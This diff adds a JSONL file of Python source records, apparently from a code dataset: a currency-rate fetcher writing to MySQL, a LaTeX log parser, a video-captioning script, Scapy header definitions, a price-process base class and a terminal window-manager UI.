diff --git "a/3539.jsonl" "b/3539.jsonl" new file mode 100644--- /dev/null +++ "b/3539.jsonl" @@ -0,0 +1,748 @@ +{"seq_id":"183534305","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport MySQLdb\nfrom datetime import *\n\ndef output_currency():\n\tcurrency = 'JPY'\n\tdatas = []\n\turl_currency = 'http://data.fixer.io/api/latest?access_key=__value__'\n\tapi_data = requests.get(url_currency).json()\n\tif api_data['success'] == True:\n\t\tdt = datetime.fromtimestamp( api_data['timestamp'] )\n\t\tcr = round(api_data['rates'][currency], 2)\n\t\tdatas.append([dt,cr,currency])\n\t\tprint(datas)\n\telse:\n\t\tprint('failed')\n\n\tsqtbl = 'api_currency' #table name\n\n\tconn = MySQLdb.connect(host = '__value__', db = '__value__', user = '__value__', password = '__value__', charset = 'utf8mb4')\n\tc = conn.cursor()\n\n\tc.execute('drop table if exists ' + sqtbl) #initialize\n\tc.execute('create table ' + sqtbl + '(Date datetime, Rate float, Currency text)')\n\n\tc.executemany('insert into ' + sqtbl + ' values (%s,%s,%s)',datas)\n\n\tconn.commit()\n\n\tc.execute('select * from ' + sqtbl + ' order by Date desc limit 10;')\n\tfor rowsql in c.fetchall():\n\t\tprint(rowsql)\n\tprint('')\n\n\tconn.close()\n\noutput_currency()\n","sub_path":"api/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"174050154","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dbtexmf/dblatex/grubber/logparser.py\n# Compiled at: 2017-04-03 18:58:57\n\"\"\"\nLaTeX document building system for Rubber.\n\nThis module defines the class that parses the LaTeX log files.\n\"\"\"\nfrom __future__ import generators\nimport re\nfrom msg import _, msg\n\nclass LogParser:\n \"\"\"\n This class performs all the extraction of information from the log file.\n For efficiency, the instances contain the whole file as a list of strings\n so that it can be read several times with no disk access.\n \"\"\"\n re_loghead = re.compile('This is [0-9a-zA-Z-]*(TeX|Omega)')\n re_rerun = re.compile('(LaTeX|Package longtable|Package bibtopic) Warning:.*Rerun')\n re_rerun2 = re.compile('\\\\(Changebar\\\\).*Rerun')\n re_file = re.compile('(\\\\((?P[^ \\n\\t(){}]*)|\\\\))')\n re_badbox = re.compile('(Ov|Und)erfull \\\\\\\\[hv]box ')\n re_line = re.compile('(l\\\\.(?P[0-9]+)( (?P.*))?$|<\\\\*>)')\n re_cseq = re.compile('.*(?P\\\\\\\\[^ ]*) ?$')\n re_page = re.compile('\\\\[(?P[0-9]+)\\\\]')\n re_atline = re.compile('( detected| in paragraph)? at lines? (?P[0-9]*)(--(?P[0-9]*))?')\n re_reference = re.compile(\"LaTeX Warning: Reference `(?P.*)' on page (?P[0-9]*) undefined on input line (?P[0-9]*)\\\\.$\")\n re_label = re.compile('LaTeX Warning: (?PLabel .*)$')\n re_warning = re.compile('(LaTeX|Package)( (?P.*))? Warning: (?P.*)$')\n re_online = re.compile('(; reported)? on input line (?P[0-9]*)')\n re_ignored = re.compile('; all text was ignored after line (?P[0-9]*).$')\n re_misschar = re.compile('Missing character: There is no (?P[^ ]*) in font (?P.*)!')\n\n def __init__(self):\n self.lines = []\n\n def read(self, name):\n \"\"\"\n Read the specified log file, checking that it was produced by the\n right compiler. Returns true if the log file is invalid or does not\n exist.\n \"\"\"\n self.lines = []\n try:\n file = open(name)\n except IOError:\n return 2\n\n line = file.readline()\n if not line:\n file.close()\n return 1\n if not self.re_loghead.match(line):\n file.close()\n return 1\n self.lines = file.readlines()\n file.close()\n return 0\n\n def errors(self):\n \"\"\"\n Returns true if there was an error during the compilation.\n \"\"\"\n skipping = 0\n for line in self.lines:\n if line.strip() == '':\n skipping = 0\n continue\n if skipping:\n continue\n m = self.re_badbox.match(line)\n if m:\n skipping = 1\n continue\n if line[0] == '!':\n if line.find('pdfTeX warning') == -1:\n return 1\n\n return 0\n\n def run_needed(self):\n \"\"\"\n Returns true if LaTeX indicated that another compilation is needed.\n \"\"\"\n for line in self.lines:\n if self.re_rerun.match(line):\n return 1\n if self.re_rerun2.match(line):\n return 1\n\n return 0\n\n def continued(self, line):\n \"\"\"\n Check if a line in the log is continued on the next line. This is\n needed because TeX breaks messages at 79 characters per line. We make\n this into a method because the test is slightly different in Metapost.\n \"\"\"\n return len(line) == 79\n\n def parse(self, errors=0, boxes=0, refs=0, warnings=0, misschars=0):\n \"\"\"\n Parse the log file for relevant information. The named arguments are\n booleans that indicate which information should be extracted:\n - errors: all errors\n - boxes: bad boxes\n - refs: warnings about references\n - warnings: all other warnings\n The function returns a generator. Each generated item is a dictionary\n that contains (some of) the following entries:\n - kind: the kind of information (\"error\", \"box\", \"ref\", \"warning\")\n - text: the text of the error or warning\n - code: the piece of code that caused an error\n - file, line, last, pkg: as used by Message.format_pos.\n \"\"\"\n if not self.lines:\n return\n else:\n last_file = None\n pos = [last_file]\n page = 1\n parsing = 0\n skipping = 0\n something = 0\n prefix = None\n accu = ''\n for line in self.lines:\n line = line[:-1]\n if self.continued(line):\n accu += line\n continue\n line = accu + line\n accu = ''\n if prefix is None and line == '':\n skipping = 0\n continue\n if skipping:\n continue\n if parsing:\n if error == 'Undefined control sequence.':\n m = self.re_cseq.match(line)\n if m:\n error = 'Undefined control sequence %s.' % m.group('seq')\n m = self.re_line.match(line)\n if m:\n parsing = 0\n skipping = 1\n pdfTeX = error.find('pdfTeX warning') != -1\n if pdfTeX and warnings or errors and not pdfTeX:\n if pdfTeX:\n d = {'kind': 'warning', 'pkg': 'pdfTeX', \n 'text': error[error.find(':') + 2:]}\n else:\n d = {'kind': 'error', 'text': error}\n d.update(m.groupdict())\n m = self.re_ignored.search(error)\n if m:\n d['file'] = last_file\n if d.has_key('code'):\n del d['code']\n d.update(m.groupdict())\n elif pos[(-1)] is None:\n d['file'] = last_file\n else:\n d['file'] = pos[(-1)]\n yield d\n elif line[0] == '!':\n error = line[2:]\n elif line[0:3] == '***':\n parsing = 0\n skipping = 1\n if errors:\n yield {'kind': 'abort', 'text': error, \n 'why': line[4:], \n 'file': last_file}\n elif line[0:15] == 'Type X to quit ':\n parsing = 0\n skipping = 0\n if errors:\n yield {'kind': 'error', 'text': error, \n 'file': pos[(-1)]}\n continue\n if len(line) > 0 and line[0] == '!':\n error = line[2:]\n parsing = 1\n continue\n if line == 'Runaway argument?':\n error = line\n parsing = 1\n continue\n if prefix is not None:\n if line[:len(prefix)] == prefix:\n text.append(line[len(prefix):].strip())\n else:\n text = (' ').join(text)\n m = self.re_online.search(text)\n if m:\n info['line'] = m.group('line')\n text = text[:m.start()] + text[m.end():]\n if warnings:\n info['text'] = text\n d = {'kind': 'warning'}\n d.update(info)\n yield d\n prefix = None\n continue\n m = self.re_reference.match(line)\n if m:\n if refs:\n d = {'kind': 'warning', 'text': _(\"Reference `%s' undefined.\") % m.group('ref'), \n 'file': pos[(-1)]}\n d.update(m.groupdict())\n yield d\n continue\n m = self.re_label.match(line)\n if m:\n if refs:\n d = {'kind': 'warning', 'file': pos[(-1)]}\n d.update(m.groupdict())\n yield d\n continue\n if line.find('Warning') != -1:\n m = self.re_warning.match(line)\n if m:\n info = m.groupdict()\n info['file'] = pos[(-1)]\n info['page'] = page\n if info['pkg'] is None:\n del info['pkg']\n prefix = ''\n else:\n prefix = '(%s)' % info['pkg']\n prefix = prefix.ljust(m.start('text'))\n text = [info['text']]\n continue\n m = self.re_badbox.match(line)\n if m:\n if boxes:\n mpos = {'file': pos[(-1)], 'page': page}\n m = self.re_atline.search(line)\n if m:\n md = m.groupdict()\n for key in ('line', 'last'):\n if md[key]:\n mpos[key] = md[key]\n\n line = line[:m.start()]\n d = {'kind': 'warning', 'text': line}\n d.update(mpos)\n yield d\n skipping = 1\n continue\n if misschars:\n m = self.re_misschar.match(line)\n if m:\n d = {'kind': 'warning', 'uchar': m.group('uchar'), \n 'font': m.group('font')}\n yield d\n continue\n last_file = self.update_file(line, pos, last_file)\n page = self.update_page(line, page)\n\n return\n\n def get_errors(self):\n return self.parse(errors=1)\n\n def get_boxes(self):\n return self.parse(boxes=1)\n\n def get_references(self):\n return self.parse(refs=1)\n\n def get_warnings(self):\n return self.parse(warnings=1)\n\n def get_misschars(self):\n return self.parse(misschars=1)\n\n def update_file(self, line, stack, last):\n \"\"\"\n Parse the given line of log file for file openings and closings and\n update the list `stack'. Newly opened files are at the end, therefore\n stack[1] is the main source while stack[-1] is the current one. The\n first element, stack[0], contains the value None for errors that may\n happen outside the source. Return the last file from which text was\n read (the new stack top, or the one before the last closing\n parenthesis).\n \"\"\"\n m = self.re_file.search(line)\n while m:\n if line[m.start()] == '(':\n last = m.group('file')\n stack.append(last)\n else:\n last = stack[(-1)]\n del stack[-1]\n line = line[m.end():]\n m = self.re_file.search(line)\n\n return last\n\n def update_page(self, line, before):\n \"\"\"\n Parse the given line and return the number of the page that is being\n built after that line, assuming the current page before the line was\n `before'.\n \"\"\"\n ms = self.re_page.findall(line)\n if ms == []:\n return before\n return int(ms[(-1)]) + 1","sub_path":"pycfiles/dblatex-0.3.10-py2.7/logparser.py","file_name":"logparser.py","file_ext":"py","file_size_in_byte":12238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270573552","text":"import cv2 \nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport pickle \nimport os\nfrom torchvision import transforms \nfrom build_vocab import Vocabulary\nfrom model import EncoderCNN, DecoderRNN\nfrom PIL import Image,ImageOps\nimport pickle\n\nimport datetime\n\n\n\n# Device configuration\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = torch.device('cpu')\n\nencoder_path = 'models/encoder-5-3000.pkl'\ndecoder_path = 'models/decoder-5-3000.pkl'\nvocab_path = 'data/vocab.pkl'\n\n#image=\nembed_size=256\nhidden_size=512\nnum_layers=1\n\ntransform = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n \n# Load vocabulary wrapper\nwith open(vocab_path, 'rb') as f:\n vocab = pickle.load(f)\n f.close() #NOTE:I think\n\n# Build models\nencoder = EncoderCNN(embed_size).eval() # eval mode (batchnorm uses moving mean/variance)\ndecoder = DecoderRNN(embed_size, hidden_size, len(vocab), num_layers)\nencoder = encoder.to(device)\ndecoder = decoder.to(device)\n\n# Load the trained model parameters\nencoder.load_state_dict(torch.load(encoder_path))\ndecoder.load_state_dict(torch.load(decoder_path))\n\n\n#vid_path = \"./data/1374258965.mp4\"\n\ndef main(args, fldr):\n # print(args.vid_path)\n vid = cv2.VideoCapture(args.vid_path) \n\n count = 0\n success = 1\n captions =[]\n count = 0\n while success:\n success, image = vid.read()\n cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n count += 1\n if count%100 == 0:\n\n cv2.imwrite(\"./\" + fldr + \"/frames/frame%d.jpg\" % count, image)\n\n \n image = Image.fromarray(image)\n \n image.save(\"./\" + fldr + \"/frames/frame%d.jpg\" % count)\n resized_image = image.resize([224, 224], Image.LANCZOS)\n trans_image = transform(resized_image).unsqueeze(0)\n\n image_tensor = trans_image.to(device)\n feature = encoder(image_tensor)\n sampled_ids = decoder.sample(feature)\n sampled_ids = sampled_ids[0].cpu().numpy()# (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n sentence = ' '.join(sampled_caption)\n\n # Print out the image and the generated caption\n print (sentence)\n text_file = open(\"./\" + fldr + \"/captions/caption%d.txt\" % count, \"w\")\n text_file.write(sentence)\n text_file.close()\n\n plt.imshow(np.asarray(image))\n\n # cv2.imwrite(\"./frames/frame%d.jpg\" % count, image) \n \nif __name__ == '__main__':\n fldr = str(datetime.datetime.now())\n os.mkdir(fldr)\n os.mkdir(fldr + \"/frames/\")\n os.mkdir(fldr + \"/captions/\")\n \n parser = argparse.ArgumentParser()\n parser.add_argument('--vid_path', type=str, required=True, help='input image for generating caption')\n args = parser.parse_args()\n main(args, fldr)\n\n \n#ODEN https://vimeo.com/channels/staffpicks/8191217 \n \n''' \npython run_squad.py \\\n --vocab_file=$../uncased_L-24_H-1024_A-16/vocab.txt \\\n --bert_config_file=$../uncased_L-24_H-1024_A-16/bert_config.json \\\n --init_checkpoint=$../uncased_L-24_H-1024_A-16/bert_model.ckpt \\\n --do_train=True \\\n --train_file=$SQUAD_DIR/train-v1.1.json \\\n --do_predict=True \\\n --predict_file=$SQUAD_DIR/dev-v1.1.json \\\n --train_batch_size=24 \\\n --learning_rate=3e-5 \\\n --num_train_epochs=2.0 \\\n --max_seq_length=384 \\\n --doc_stride=128 \\\n --output_dir=gs://some_bucket/squad_large/ \\\n --use_tpu=False\n \npython run_squad.py \\\n --vocab_file=../uncased_L-24_H-1024_A-16/vocab.txt\\\n --bert_config_file=../uncased_L-24_H-1024_A-16/bert_config.json\\\n --init_checkpoint=../uncased_L-24_H-1024_A-16/bert_model.ckpt\\\n --do_train=True \\\n --train_file=../SQUAD_DIR/train-v2.0.json\\\n --do_predict=True \\\n --predict_file=../SQUAD_DIR/dev-v2.0.json\\\n --train_batch_size=24 \\\n --learning_rate=3e-5 \\\n --num_train_epochs=2.0 \\\n --max_seq_length=384 \\\n --doc_stride=128 \\\n --output_dir=../output\\\n --use_tpu=False \\\n --version_2_with_negative=True\n '''","sub_path":".ipynb_checkpoints/video_sampling-checkpoint.py","file_name":"video_sampling-checkpoint.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"396254367","text":"from scapy.all import *\n\n##class definitions\nclass Ethernet(Packet):\n\tname = 'ethernet'\n\tfields_desc = [\n\t\tXBitField(dstAddr, 0, 48),\n\t\tXBitField(srcAddr, 0, 48),\n\t\tShortField(etherType, 0),\n\t]\nclass Ipv4(Packet):\n\tname = 'ipv4'\n\tfields_desc = [\n\t\tXBitField(version, 0, 4),\n\t\tXBitField(ihl, 0, 4),\n\t\tByteField(diffserv, 0),\n\t\tShortField(totalLen, 0),\n\t\tShortField(identification, 0),\n\t\tXBitField(flags, 0, 3),\n\t\tXBitField(fragOffset, 0, 13),\n\t\tByteField(ttl, 0),\n\t\tByteField(protocol, 0),\n\t\tShortField(hdrChecksum, 0),\n\t\tIntField(srcAddr, 0),\n\t\tIntField(dstAddr, 0),\n\t]\n\t#update hdrChecksum over [[u'ipv4', u'version'], [u'ipv4', u'ihl'], [u'ipv4', u'diffserv'], [u'ipv4', u'totalLen'], [u'ipv4', u'identification'], [u'ipv4', u'flags'], [u'ipv4', u'fragOffset'], [u'ipv4', u'ttl'], [u'ipv4', u'protocol'], [u'ipv4', u'srcAddr'], [u'ipv4', u'dstAddr']] using csum16 in post_build method\n\n\n##bindings\nbind_layers(Ethernet, Ipv4, etherType = 0x0800)\n\n##packet_list\npossible_packets = [\n\t(Ethernet()),\n\t(Ethernet()/Ipv4())\n]\n","sub_path":"samples/ipv4_forward/output/scapy/ipv4_forward.py","file_name":"ipv4_forward.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556615998","text":"from __future__ import division\n\nimport datetime\nfrom abc import ABCMeta, abstractmethod\nimport six\n\nDAYS_PER_YEAR = 365\nSECONDS_PER_DAY = 86400\n\n\nclass PriceProcess(six.with_metaclass(ABCMeta)):\n\n @abstractmethod\n def simulate_future_prices(self, observation_date, requirements, path_count, calibration_params):\n \"\"\"\n Returns a generator that yields a sequence of simulated prices.\n \"\"\"\n\n def get_commodity_names_and_fixing_dates(self, observation_date, requirements):\n # Get an ordered list of all the commodity names and fixing dates.\n commodity_names = sorted(set([r[0] for r in requirements]))\n observation_date = datetime_from_date(observation_date)\n\n requirement_datetimes = [datetime_from_date(r[1]) for r in requirements]\n\n fixing_dates = sorted(set([observation_date] + requirement_datetimes))\n return commodity_names, fixing_dates\n\n\ndef get_duration_years(start_date, end_date, days_per_year=DAYS_PER_YEAR):\n try:\n time_delta = datetime_from_date(end_date) - datetime_from_date(start_date)\n except TypeError as inst:\n raise TypeError(\"%s: start: %s end: %s\" % (inst, start_date, end_date))\n return time_delta.total_seconds() / float(days_per_year * SECONDS_PER_DAY)\n\n\ndef datetime_from_date(observation_date):\n if isinstance(observation_date, datetime.date):\n return datetime.datetime(observation_date.year, observation_date.month, observation_date.day)\n else:\n return observation_date\n","sub_path":"quantdsl/priceprocess/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444604895","text":"import abc\nfrom collections.abc import Iterable\nfrom .app import App\nfrom .string_buffer import StringBuffer\n# from .control import Button\n\nclass Window:\n main_wnd = None\n handle = -1\n term = None\n\n debug = open('debug.log', 'w')\n\n def __init__(self):\n # self.term = Terminal()\n app = App()\n self.term = app.term\n self.background_clr = 'cyan' # \"magenta\"\n self.text_clr = \"white\"\n\n app = App()\n self.screen = app.screen\n\n @abc.abstractmethod\n def set_base_corner(self, x=0, y=0): ...\n\n @abc.abstractmethod\n def set_right_corner(self, x, y): ...\n\n @abc.abstractmethod\n def set_parent(self, parent=None): ...\n\n @abc.abstractmethod\n def run(self, key=None) -> int: ...\n\n @abc.abstractmethod\n def render(self): ...\n\n @abc.abstractmethod\n def on_resize(self, sig, action): ...\n\n @abc.abstractmethod\n def on_paint(self): ...\n\n @abc.abstractmethod\n def on_focus(self, focus: bool = False): ...\n\n @abc.abstractmethod\n def add_main_menu(self, menu): ...\n\n def set_main_wnd(self, mainwnd):\n self.main_wnd = mainwnd\n\n @abc.abstractmethod\n def _focused_sub_wnd(self, handle, sub, focus=True) -> int: ...\n\n @abc.abstractmethod\n def child_lose_focus(self): ...\n\n @abc.abstractmethod\n def is_menu(self) -> bool: ...\n\n def set_handle(self, handle: int = -1):\n self.handle = handle\n\nclass MainWindow(Window):\n\n string_buffer = None\n\n def __init__(self):\n super().__init__()\n # self.term = Terminal()\n height, width = self.term.height, self.term.width\n\n self.left_top_corner = \"\\u250c\"\n self.right_top_corner = \"\\u2510\"\n self.left_bottom_corner = \"\\u2514\"\n self.right_bottom_corner = \"\\u2518\"\n self.hor_line = \"\\u2500\"\n self.vert_line = \"\\u2502\"\n self.background_clr = 'darkgrey' #'cyan' # \"magenta\"\n self.main_menu = None\n self.main_menu_key = \"KEY_F9\"\n self.wnd_border = True\n self.work_spc_border = True\n self.focus_owner = True\n self.focus = True\n self.main_menu_focus = False\n self.selected_wnd = -1\n self.focused_wnd = None\n self.focused_wnd_handle = -1\n self.next_sub_wnd = ['KEY_TAB', 'KEY_RIGHT']\n self.prev_sub_wnd = ['KEY_LEFT']\n\n self.x = 0\n self.y = 0\n self.rx = width - 1\n self.ry = height - 1\n self.sub_windows = {}\n self.wnd_count = 0\n\n # self.string_buffer = [\"\",]\n # self.cur_pos = 0\n # self.delta = 0\n\n self.screen_id = self.screen.bind()\n self.main_wnd = self\n\n self.string_buffer = StringBuffer(self.text_clr, self.background_clr, self.screen, self.screen_id)\n self.work_size()\n\n\n\n def set_base_corner(self, x=0, y=0):\n ...\n\n def get_anchor(self)-> tuple:\n return (0, 0)\n\n def set_parent(self, parent=None):\n ...\n\n def shift_focus(self, direction='right'):\n\n handles = list(self.sub_windows.keys())\n handles.sort()\n\n if len(handles) != 0 and len(handles) > 1:\n\n pos:int = 0\n if direction == 'right':\n pos = handles.index(self.focused_wnd_handle) + 1\n elif direction == 'left':\n pos = handles.index(self.focused_wnd_handle) - 1\n\n if pos == len(handles):\n pos = 0\n\n if pos < 0:\n pos = len(handles) - 1\n\n self.focused_wnd.on_focus(False)\n # self.focused_wnd.on_paint()\n self.echo('handles = ' + str(handles) + ' pos = ' + str(pos) + '\\n')\n self.focused_wnd = self.sub_windows[handles[pos]]\n self.focused_wnd.on_focus(True)\n self.focused_wnd_handle = handles[pos]\n # self.focused_wnd.on_paint()\n self.on_paint()\n\n def work_size(self):\n self.wl_x = self.x\n self.wl_y = self.y\n self.wr_x = self.rx\n self.wr_y = self.ry\n\n if self.wnd_border:\n self.wl_x = self.x + 1\n self.wl_y = self.y + 1\n self.wr_x = self.rx - 1\n self.wr_y = self.ry - 1\n\n if self.main_menu is not None:\n self.wl_y += 1\n\n w = (self.wr_x - self.wl_x)\n h = (self.wr_y - self.wl_y)\n self.string_buffer.set_work_size(self.wl_x, self.wl_y + 1, h, w)\n\n def echo(self, string=None):\n self.string_buffer.print(string)\n self.on_paint()\n\n def is_menu(self) -> bool:\n return False\n\n\n def attach(self, wnd=None):\n handle = self.wnd_count\n if wnd is not None:\n wnd.parent = self\n wnd.main_wnd = self #self.main_wnd\n wnd.handle = handle\n\n self.sub_windows[self.wnd_count] = wnd\n self.wnd_count += 1\n\n def _focused_sub_wnd(self, handle, sub, focus=True) -> int:\n # handle = self.wnd_count\n # if sub is not None:\n # self.sub_windows[self.wnd_count] = sub\n # self.wnd_count += 1\n\n if focus:\n if self.focused_wnd is not None and self.focused_wnd != sub:\n self.focused_wnd.on_focus(False)\n self.focused_wnd = sub\n self.main_menu_focus = False\n self.focus_owner = True\n if self.main_menu is not None:\n self.main_menu.on_focus(False)\n self.focused_wnd_handle = handle\n self.on_paint()\n\n return handle\n\n def _un_bind_window(self, handle=-1):\n handles = list(self.sub_windows.keys())\n handles.sort()\n pos = handles.index(handle)\n self.echo(f'un_bind 1 - {str(handles)}\\n')\n\n try:\n self.sub_windows.pop(handle)\n except KeyError:\n print(f'Window handle \\'{handle}\\' does not exist')\n exit(-1)\n self.focused_wnd.on_focus(False)\n\n next_handle: int = 0\n handles.pop(pos)\n\n if len(handles) != 0:\n if len(handles) == 1:\n next_handle = handles[0]\n else:\n if pos >= len(handles):\n next_handle = handles[0]\n else:\n next_handle = handles[pos]\n self.echo('un bind 2 - ' + str(handles) + str(next_handle) + '\\n')\n self.focused_wnd = self.sub_windows[next_handle]\n self.focused_wnd.on_focus(True)\n self.focused_wnd_handle = next_handle\n else:\n self.focused_wnd = None\n self.on_paint()\n\n def __clear_scr(self):\n height = self.ry - self.y\n width = self.rx - self.x\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n\n for x in range(width):\n for y in range(height):\n # echo(self.term.move_xy(x, y) + f'{scr_back_clr} ')\n self.screen.echo(self.screen_id, x, y, f'{scr_back_clr} {self.term.normal}{scr_back_clr}')\n\n def string_buffer_render(self):\n self.string_buffer.string_buffer_render()\n\n def get_string_buffer_symbol(self, x, y):\n return self.string_buffer.get_string_buffer_symbol(x, y)\n\n def window_render(self):\n height = self.ry - self.y\n width = self.rx - self.x\n scr_back_clr = getattr(self.term, 'on_' + self.background_clr)\n # print(self.term.clear())\n\n if self.wnd_border:\n # top corners\n self.screen.echo(self.screen_id, self.x, self.y, f'{scr_back_clr}{self.left_top_corner}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.y, f'{scr_back_clr}{self.right_top_corner}{self.term.normal}{scr_back_clr}')\n\n # bottom corners\n self.screen.echo(self.screen_id, self.x, self.ry, f'{scr_back_clr}{self.left_bottom_corner}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.ry, f'{scr_back_clr}{self.right_bottom_corner}{self.term.normal}{scr_back_clr}')\n\n # lines\n # horizontal lines\n for ii in range(0, width - 1, 1):\n self.screen.echo(self.screen_id, self.x + ii + 1, self.y, f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.x + ii + 1, self.ry, f'{scr_back_clr}{self.hor_line}{self.term.normal}{scr_back_clr}')\n\n # vertical lines\n for ii in range(height - 1):\n self.screen.echo(self.screen_id, self.x, self.y + ii + 1, f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n self.screen.echo(self.screen_id, self.rx, self.y + ii + 1, f'{scr_back_clr}{self.vert_line}{self.term.normal}{scr_back_clr}')\n\n if self.work_spc_border:\n pass\n\n self.string_buffer_render()\n\n if self.main_menu is not None:\n self.main_menu.on_paint()\n\n for k, w in self.sub_windows.items():\n if k != self.focused_wnd_handle:\n w.on_paint()\n\n if self.focused_wnd is not None:\n self.focused_wnd.on_paint()\n\n\n def render(self):\n self.__clear_scr()\n self.window_render()\n\n\n def run(self, key=None):\n # clr = getattr(self.term, 'on_' + self.background_clr)\n # echo(f'{clr}')\n\n self.selection = 0\n\n # res = 0\n\n self.debug.write('main wnd ' + str(key) + f' {key.name}\\n')\n\n if self.focused_wnd is not None and not self.main_menu_focus:\n key = self.focused_wnd.run(key)\n if key is not None and key.is_sequence:\n if key.name == self.main_menu_key: #and res != -1:\n self.focus_owner = not self.focus_owner\n self.main_menu.on_focus(not self.focus_owner)\n self.main_menu_focus = not self.focus_owner\n self.on_paint()\n else:\n if not self.focus_owner and self.main_menu_focus:\n self.main_menu.run(key)\n else:\n if key.name == 'KEY_ENTER':\n return key\n elif key.name in self.next_sub_wnd:\n self.shift_focus(direction='right')\n return None\n elif key.name in self.prev_sub_wnd:\n self.shift_focus(direction='left')\n return None\n else:\n return key\n # self.on_paint()\n return key\n\n def on_resize(self, sig, action):\n height, width = self.term.height, self.term.width\n self.rx = width - 1\n self.ry = height - 1\n self.work_size()\n self.screen.reset()\n self.on_paint()\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def on_focus(self, focus: bool = False):\n pass\n\n def add_main_menu(self, menu):\n self.main_menu = menu\n self.main_menu.set_parent(self)\n self.main_menu.set_main_wnd(self)\n if self.wnd_border:\n self.main_menu.set_base_corner(1, 1)\n else:\n self.main_menu.set_base_corner(0, 0)\n\n\n####################################################################################\n\n\nclass SubWindow(MainWindow):\n\n def __init__(self):\n super().__init__()\n self.parent = None\n self.wnd_border = True\n self.background_clr = \"magenta\"\n self.title = \"\"\n self.modal = False # True\n self.escape = [\"KEY_ESCAPE\"] #, \"KEY_LEFT\"]\n self.handle = -1\n self.base_corner = None\n\n self.on_focus_dict = {'left_top_corner':'\\u2554', 'right_top_corner':'\\u2557',\n 'left_bottom_corner':'\\u255A', 'right_bottom_corner':'\\u255D',\n 'hor_line':'\\u2550', 'vert_line':'\\u2551'}\n\n self.not_focus_dict = {'left_top_corner':'\\u250c', 'right_top_corner':'\\u2510',\n 'left_bottom_corner':'\\u2514', 'right_bottom_corner':'\\u2518',\n 'hor_line':'\\u2500', 'vert_line':'\\u2502'}\n\n self.screen_id = self.screen.bind()\n self._display = False\n\n\n def set_base_corner(self, x=0, y=0):\n self.base_corner = (x, y)\n anchor = self.parent.get_anchor()\n self.x = 0\n self.y = 0\n self.screen.set_base_corner(self.screen_id, x + anchor[0], y + anchor[1])\n\n def get_anchor(self)-> tuple:\n anchor = (0, 0)\n if self.parent is not None:\n anchor = self.parent.get_anchor()\n return (self.base_corner[0] + anchor[0], self.base_corner[1] + anchor[1])\n\n def set_right_corner(self, x, y):\n self.rx = x - self.base_corner[0]\n self.ry = y - self.base_corner[1]\n self.work_size()\n\n def set_parent(self, parent=None):\n self.parent = parent\n\n def __clear_scr(self):\n height = self.ry - self.y\n width = self.rx - self.x\n clr = getattr(self.term, 'on_' + self.background_clr)\n for i in range(width):\n for j in range(height):\n self.screen.echo(self.screen_id, i, j, f'{clr} {self.term.normal}{clr}')\n\n def on_paint(self):\n self.screen.begin()\n self.render()\n self.screen.end()\n\n def __change_focus(self):\n if self.focus:\n self.left_top_corner = self.on_focus_dict['left_top_corner']\n self.right_top_corner = self.on_focus_dict['right_top_corner']\n self.left_bottom_corner = self.on_focus_dict['left_bottom_corner']\n self.right_bottom_corner = self.on_focus_dict['right_bottom_corner']\n self.hor_line = self.on_focus_dict['hor_line']\n self.vert_line = self.on_focus_dict['vert_line']\n else:\n self.left_top_corner = self.not_focus_dict['left_top_corner']\n self.right_top_corner = self.not_focus_dict['right_top_corner']\n self.left_bottom_corner = self.not_focus_dict['left_bottom_corner']\n self.right_bottom_corner = self.not_focus_dict['right_bottom_corner']\n self.hor_line = self.not_focus_dict['hor_line']\n self.vert_line = self.not_focus_dict['vert_line']\n\n def on_focus(self, focus: bool = False):\n self.focus = focus\n self.work_size()\n self.__change_focus()\n if self.focus and not self._display:\n self.main_wnd._focused_sub_wnd(self.handle, self, True)\n self._display = True\n\n def render(self):\n self.__clear_scr()\n self.window_render()\n if self.title != \"\":\n title = self.title\n clr = getattr(self.term, 'on_' + self.background_clr)\n title_length = len(self.title)\n width = self.rx - self.x\n pos = int((width - title_length) / 2.)\n self.screen.echo(self.screen_id, pos, 0, f'{clr}{title}{self.term.normal}{clr}')\n\n def __find_key(self, key, keys=None):\n if key is not None and isinstance(keys, Iterable):\n for k in keys:\n if k == keys:\n return True\n return False\n\n def _remove_wnd(self):\n self.main_wnd._un_bind_window(self.handle)\n self.handle = -1\n self._display = False\n self.screen.disable_region(self.screen_id)\n\n def run(self, key=None):\n self.debug.write(f'1 {str(key.encode(\"unicode_escape\"))} -- {key.is_sequence} -- {key.name}\\n')\n if self.focused_wnd is not None and not self.main_menu_focus:\n key = self.focused_wnd.run(key)\n self.debug.write(f'2\\n')\n if key is not None:\n if key.is_sequence:\n if key.name in self.escape:\n self._remove_wnd()\n self.debug.write(f'escape\\n')\n return None\n else:\n return key\n # else:\n # self.debug.write(f'3\\n')\n # self.echo(f'{key}')\n if self.modal:\n return None\n return key\n 